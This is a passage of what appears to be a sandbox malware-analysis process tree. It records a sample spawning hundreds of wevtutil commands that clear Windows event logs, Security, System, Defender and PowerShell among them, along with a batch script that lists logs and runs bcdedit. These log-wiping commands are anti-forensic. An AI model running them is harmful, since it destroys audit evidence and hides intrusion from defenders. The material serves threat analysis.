PID:576

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ServiceReportingApi/Debug"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Services-Svchost/Diagnostic"
5⤵
PID:2020

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Services/Diagnostic"
5⤵
PID:1980

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Setup/Analytic"
5⤵
PID:1624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SetupCl/Analytic"
5⤵
PID:1472

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SetupQueue/Analytic"
5⤵
PID:580

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SetupUGC/Analytic"
5⤵
PID:328

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
5⤵
PID:1484

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
5⤵
PID:892

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
5⤵
PID:1336

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
5⤵
PID:1840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
5⤵
PID:1620

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-Core/Diagnostic"
5⤵
PID:840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-Shwebsvc"
5⤵
PID:1196

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
5⤵
PID:1692

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Shsvcs/Diagnostic"
5⤵
PID:1492

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Sidebar/Diagnostic"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Speech-UserExperience/Diagnostic"
5⤵
PID:316

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Spell-Checking/Analytic"
5⤵
PID:1840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SpellChecker/Analytic"
5⤵
PID:1072

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StickyNotes/Admin"
5⤵
PID:1616

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StickyNotes/Debug"
5⤵
PID:560

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StickyNotes/Diagnostic"
5⤵
PID:892

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StorDiag/Operational"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-StorPort/Operational"
5⤵
PID:1488

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Subsys-Csr/Operational"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Subsys-SMSS/Operational"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Superfetch/Main"
5⤵
PID:1676

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Superfetch/StoreLog"
5⤵
PID:1072

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Sysprep/Analytic"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-SystemHealthAgent/Diagnostic"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TCPIP/Diagnostic"
5⤵
PID:1492

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TSF-msctf/Debug"
5⤵
PID:1496

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TSF-msctf/Diagnostic"
5⤵
PID:1660

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TSF-msutb/Debug"
5⤵
PID:1472

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TSF-msutb/Diagnostic"
5⤵
PID:1668

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TZUtil/Operational"
5⤵
PID:892

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Debug"
5⤵
PID:1196

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Diagnostic"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Operational"
5⤵
PID:1112

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TaskbarCPL/Diagnostic"
5⤵
PID:1336

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
5⤵
PID:204

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
5⤵
PID:1652

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
5⤵
PID:1676

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
5⤵
PID:1492

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
5⤵
PID:908

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
5⤵
PID:1840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
5⤵
PID:236

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
5⤵
PID:560

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RDPClient/Debug"
5⤵
PID:840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RDPClient/Operational"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
5⤵
PID:204

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
5⤵
PID:428

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
5⤵
PID:2020

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"
5⤵
PID:792

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"
5⤵
PID:1652

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"
5⤵
PID:544

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ThemeCPL/Diagnostic"
5⤵
PID:1168

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ThemeUI/Diagnostic"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TunnelDriver"
5⤵
PID:1988

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UAC-FileVirtualization/Operational"
5⤵
PID:316

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UAC/Operational"
5⤵
PID:1648

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UIAnimation/Diagnostic"
5⤵
PID:1032

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UIAutomationCore/Debug"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UIAutomationCore/Diagnostic"
5⤵
PID:1652

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UIAutomationCore/Perf"
5⤵
PID:960

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UIRibbon/Diagnostic"
5⤵
PID:624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-USB-USBHUB/Diagnostic"
5⤵
PID:316

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-USB-USBPORT/Diagnostic"
5⤵
PID:604

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-User Control Panel Performance/Diagnostic"
5⤵
PID:1308

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-User Profile Service/Diagnostic"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-User Profile Service/Operational"
5⤵
PID:432

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-User-Loader/Analytic"
5⤵
PID:1988

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UserModePowerService/Diagnostic"
5⤵
PID:1336

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UserPnp/DeviceNotifications"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UserPnp/Performance"
5⤵
PID:960

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UserPnp/SchedulerOperations"
5⤵
PID:316

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UxTheme/Diagnostic"
5⤵
PID:768

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VAN/Diagnostic"
5⤵
PID:1196

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VDRVROOT/Operational"
5⤵
PID:1628

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VHDMP/Operational"
5⤵
PID:1840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VWiFi/Diagnostic"
5⤵
PID:1476

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VolumeControl/Performance"
5⤵
PID:560

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VolumeSnapshot-Driver/Operational"
5⤵
PID:1076

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WABSyncProvider/Analytic"
5⤵
PID:1196

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"
5⤵
PID:1676

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WER-Diag/Operational"
5⤵
PID:580

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WFP/Analytic"
5⤵
PID:1992

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WFP/Operational"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WLAN-AutoConfig/Operational"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"
5⤵
PID:1676

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WLANConnectionFlow/Diagnostic"
5⤵
PID:1036

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WMI-Activity/Trace"
5⤵
PID:1512

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WMPDMCCore/Diagnostic"
5⤵
PID:604

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WMPDMCUI/Diagnostic"
5⤵
PID:1980

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WMPNSS-Service/Diagnostic"
5⤵
PID:1136

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WMPNSSUI/Diagnostic"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WPD-ClassInstaller/Analytic"
5⤵
PID:1676

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WPD-ClassInstaller/Operational"
5⤵
PID:828

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"
5⤵
PID:1196

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WPD-CompositeClassDriver/Operational"
5⤵
PID:1336

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WPD-MTPClassDriver/Operational"
5⤵
PID:1652

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WSC-SRV/Diagnostic"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WUSA/Debug"
5⤵
PID:1136

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WWAN-MM-Events/Diagnostic"
5⤵
PID:1492

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"
5⤵
PID:960

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"
5⤵
PID:1648

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WWAN-UI-Events/Diagnostic"
5⤵
PID:1988

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WebIO-NDF/Diagnostic"
5⤵
PID:1112

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WebIO/Diagnostic"
5⤵
PID:1628

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WebServices/Tracing"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Win32k/Concurrency"
5⤵
PID:1692

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Win32k/Power"
5⤵
PID:1992

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Win32k/Render"
5⤵
PID:328

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Win32k/Tracing"
5⤵
PID:1624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Win32k/UIPI"
5⤵
PID:1224

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WinHTTP-NDF/Diagnostic"
5⤵
PID:1136

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WinHttp/Diagnostic"
5⤵
PID:688

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WinINet/Analytic"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WinRM/Analytic"
5⤵
PID:576

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WinRM/Debug"
5⤵
PID:228

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WinRM/Operational"
5⤵
PID:204

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Windeploy/Analytic"
5⤵
PID:1224

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Windows Defender/Operational"
5⤵
PID:1136

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Windows Defender/WHC"
5⤵
PID:960

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"
5⤵
PID:1992

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"
5⤵
PID:1032

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"
5⤵
PID:768

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"
5⤵
PID:204

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WindowsBackup/ActionCenter"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WindowsColorSystem/Debug"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WindowsColorSystem/Operational"
5⤵
PID:688

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WindowsUpdateClient/Operational"
5⤵
PID:1648

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Wininit/Diagnostic"
5⤵
PID:1168

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Winlogon/Diagnostic"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Winlogon/Operational"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Winsock-AFD/Operational"
5⤵
PID:1196

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Winsock-WS2HELP/Operational"
5⤵
PID:544

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Winsrv/Analytic"
5⤵
PID:236

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Wired-AutoConfig/Diagnostic"
5⤵
PID:1676

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Wired-AutoConfig/Operational"
5⤵
PID:1036

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Wordpad/Admin"
5⤵
PID:1488

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Wordpad/Debug"
5⤵
PID:604

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Wordpad/Diagnostic"
5⤵
PID:1840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-mobsync/Diagnostic"
5⤵
PID:1652

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ntshrui"
5⤵
PID:792

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-osk/Diagnostic"
5⤵
PID:624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-stobject/Diagnostic"
5⤵
PID:828

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "OAlerts"
5⤵
PID:236

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Security"
5⤵
PID:1136

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Setup"
5⤵
PID:208

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "System"
5⤵
PID:228

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "TabletPC_InputPanel_Channel"
5⤵
PID:1840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "WINDOWS_MP4SDECD_CHANNEL"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "WINDOWS_MSMPEG2VDEC_CHANNEL"
5⤵
PID:1168

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "WINDOWS_WMPHOTO_CHANNEL"
5⤵
PID:768

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "WMPSetup"
5⤵
PID:544

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "WMPSyncEngine"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Windows PowerShell"
5⤵
PID:1336

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"
5⤵
PID:1944

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "muxencode"
5⤵
PID:908

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3.bat"
4⤵
PID:2004

C:\Windows\system32\mode.com
mode con cols=74 lines=20
5⤵
PID:1976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit
5⤵
PID:1544

C:\Windows\system32\bcdedit.exe
bcdedit
6⤵
PID:228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe el
5⤵
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe el
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Analytic"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Application"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DebugChannel"
5⤵
PID:1520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowFilterGraph"
5⤵
PID:1212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowPluginControl"
5⤵
PID:1616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Els_Hyphenation/Analytic"
5⤵
PID:2020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "EndpointMapper"
5⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "ForwardedEvents"
5⤵
PID:700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "HardwareEvents"
5⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Internet Explorer"
5⤵
PID:1640

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Key Management Service"
5⤵
PID:700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
5⤵
PID:1640

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Media Center"
5⤵
PID:768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDeviceProxy"
5⤵
PID:1692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformance"
5⤵
PID:1980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPipeline"
5⤵
PID:1976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPlatform"
5⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IE/Diagnostic"
5⤵
PID:1072

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
5⤵
PID:1616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
5⤵
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
5⤵
PID:1660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
5⤵
PID:700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
5⤵
PID:1972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
5⤵
PID:1652

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
5⤵
PID:1520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
5⤵
PID:328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
5⤵
PID:768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
5⤵
PID:308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
5⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
5⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
5⤵
PID:1692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
5⤵
PID:1880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
5⤵
PID:1212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
5⤵
PID:1520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
5⤵
PID:288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
5⤵
PID:1840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
5⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
5⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
5⤵
PID:1660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
5⤵
PID:1212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
5⤵
PID:1472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
5⤵
PID:520

